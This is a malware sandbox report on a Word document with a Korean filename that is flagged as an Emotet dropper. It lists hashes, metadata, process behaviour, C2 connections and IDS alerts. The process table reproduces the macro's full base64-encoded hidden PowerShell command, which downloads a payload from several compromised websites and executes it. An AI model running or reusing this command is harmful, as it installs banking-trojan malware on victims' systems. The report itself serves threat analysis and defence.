analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

손익 분석 내용_December.doc

Full analysis: https://app.any.run/tasks/f410ad85-90f9-457e-b76a-d7bf19946c5a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 03, 2019, 00:21:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: At quas et., Author: Keno Zapletal, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 2 20:36:00 2019, Last Saved Time/Date: Mon Dec 2 20:36:00 2019, Number of Pages: 1, Number of Words: 59, Number of Characters: 340, Security: 0
MD5:

BA61ECC0EC74DB2B565B2E14C9EA17CF

SHA1:

7E0AC6C9DE9CF55628793AC2DBABAE23FD8186B1

SHA256:

952BE89995CBCC0B1FEAD8E493A7E49D6FE171E853B786A5DAB4A17D5A25F254

SSDEEP:

6144:YyUBmXvqO2U962k4ctGiL3HJkkyD7b8QPpT05:YyUBmXvqO2U96BQitkf7bHpT05

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 105.exe (PID: 1932)
      • 105.exe (PID: 3616)
      • serialfunc.exe (PID: 1800)
      • serialfunc.exe (PID: 3600)
    • Emotet process was detected

      • 105.exe (PID: 3616)
    • EMOTET was detected

      • serialfunc.exe (PID: 1800)
    • Connects to CnC server

      • serialfunc.exe (PID: 1800)
  • SUSPICIOUS

    • Application launched itself

      • 105.exe (PID: 1932)
      • serialfunc.exe (PID: 3600)
    • Executed via WMI

      • powershell.exe (PID: 584)
    • Creates files in the user directory

      • powershell.exe (PID: 584)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 584)
      • 105.exe (PID: 3616)
    • PowerShell script executed

      • powershell.exe (PID: 584)
    • Starts itself from another location

      • 105.exe (PID: 3616)
    • Connects to server without host name

      • serialfunc.exe (PID: 1800)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 492)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 492)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Forms 2.0 Form
CompObjUserTypeLen: 25
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 398
Paragraphs: 1
Lines: 2
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 340
Words: 59
Pages: 1
ModifyDate: 2019:12:02 20:36:00
CreateDate: 2019:12:02 20:36:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Keno Zapletal
Subject: -
Title: At quas et.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 105.exe no specs #EMOTET 105.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
492"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\손익 분석 내용_December.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
584powershell -w hidden -en JABMAHkAbwB3AG4AdQB1AG8AegBxAGkAbwBzAD0AJwBJAHkAZwBsAGsAZgB0AGIAbQBmACcAOwAkAFEAaABsAHkAYQBsAGEAYQBiACAAPQAgACcAMQAwADUAJwA7ACQATgBrAHUAYQB4AHAAcQBqAHIAcwA9ACcARgBpAHYAcgBoAHQAcwBhAG8AZABjAHQAJwA7ACQATAB2AGMAdABsAGIAaABnAG8AZgBuAHoAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBoAGwAeQBhAGwAYQBhAGIAKwAnAC4AZQB4AGUAJwA7ACQAUQByAHcAYwBxAGsAYQBrAGIAbwA9ACcAUQBjAGgAYwBxAGcAbwBzAGYAJwA7ACQAUABwAHgAdQBhAG4AbgBhAD0ALgAoACcAbgBlACcAKwAnAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAdAAuAHcAZQBiAGMATABpAEUATgBUADsAJABaAGcAcgBrAGIAbQBmAG0AawBsAGsAaQBkAD0AJwBoAHQAdABwAHMAOgAvAC8AagB1AG4AawBmAG8AbwBkAC4AaQBkAC8AdwBlAGIALwAyAGMAeAByADAALQB1AGIAegA1ADYAbwBhAC0AMAA1ADcAMwA2ADcAMwA2AC8AKgBoAHQAdABwAHMAOgAvAC8AbwBuAGUAdABlAGMAaAAuAGEAcwBpAGEALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAGoAdgAtAGUAZgBmAGUAYwB0AC8AagBzAC8ATwBVAFUAdABUAG8ALwAqAGgAdAB0AHAAOgAvAC8AYwBuAHQAaABhAGkALgBjAG8ALgB0AGgALwB3AHAALQBhAGQAbQBpAG4ALwBpAG0AYQBnAGUAcwAvADcAaAB0AHIAawA4AGkAOAAtAHkAMQB2ADUANQAtADIANQAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBkAGUAdgBvAG8AYQBwAHAALgBjAG8AbQAvAHoAZAB1AGIALwAyAGYAaABhAHEANgA1AGEAZgAtAG4AOQA2AHoAbQA5ADUAMAAtADgANgAzAC8AKgBoAHQAdABwADoALwAvAGMAaABvAG4AbQB1AGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBQAFQAVgBEAEsAQwAvACcALgAiAHMAUABsAGAASQBUACIAKAAnACoAJwApADsAJABKAGUAbQBqAHQAdwBqAGkAYQBrAG0AegB5AD0AJwBCAGgAcwB1AGcAZwB2AHoAYwBxAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFAAbQBtAHkAawBjAG8AaQBjAG4AbgBzACAAaQBuACAAJABaAGcAcgBrAGIAbQBmAG0AawBsAGsAaQBkACkAewB0AHIAeQB7ACQAUABwAHgAdQBhAG4AbgBhAC4AIgBEAE8AdwBuAGwAbwBhAGAAZABmAGAAaQBgAGwAZQAiACgAJABQAG0AbQB5AGsAYwBvAGkAYwBuAG4AcwAsACAAJABMAHYAYwB0AGwAYgBoAGcAbwBmAG4AegB3ACkAOwAkAFcAZgB4AGcAcwB0AG0AeABlAGIAPQAnAFIAZwB1AHgAZQBkAGkAcABhAGUAZwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEwAdgBjAHQAbABiAGgAZwBvAGYAbgB6AHcAKQAuACIAbABgAGUAbgBHAHQAaAAiACAALQBnAGUAIAAyADAANAA2ADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAHQAIgAoACQATAB2AGMAdABsAGIAaABnAG8AZgBuAHoAdwApADsAJABSAG4AZQBrAHQAegBrAHgAbAB2AG0APQAnAEYAYQByAHcAZwBsAGcAcAB6ACcAOwBiAHIAZQBhAGsAOwAkAFgAbQBsAHcAbAByAHkAdwA9ACcAQgB6AHQAdABoAGgAZAB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAegB3AGMAcABqAGgAYQBwAGQAYQBzAG0APQAnAEcAbwBvAGwAdQB4AHEAagBlAGUAYQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1932"C:\Users\admin\105.exe" C:\Users\admin\105.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3616--d332b934C:\Users\admin\105.exe
105.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3600"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe105.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1800--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 294
Read events
1 465
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
1
Unknown types
7

Dropped files

PID
Process
Filename
Type
492WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDDCC.tmp.cvr
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E0DC64D.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\313ABFEA.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64CFAE3.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E0A2F88.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9BC99E9.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BA7A6D6.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEE2BCDF.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA8B7154.wmf
MD5:
SHA256:
492WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19703945.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1800
serialfunc.exe
POST
190.5.162.204:80
http://190.5.162.204/bmJej
AR
malicious
1800
serialfunc.exe
POST
200
72.69.99.47:80
http://72.69.99.47/q3sCWC7OyYch5
US
binary
285 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
584
powershell.exe
103.27.206.196:443
junkfood.id
PT. Beon Intermedia
ID
malicious
190.5.162.204:80
MERCO COMUNICACIONES
AR
malicious
1800
serialfunc.exe
72.69.99.47:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
584
powershell.exe
3.114.91.202:443
onetech.asia
US
unknown

DNS requests

Domain
IP
Reputation
junkfood.id
  • 103.27.206.196
unknown
onetech.asia
  • 3.114.91.202
unknown

Threats

PID
Process
Class
Message
1800
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1800
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1800
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1800
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1800
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1800
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
No debug info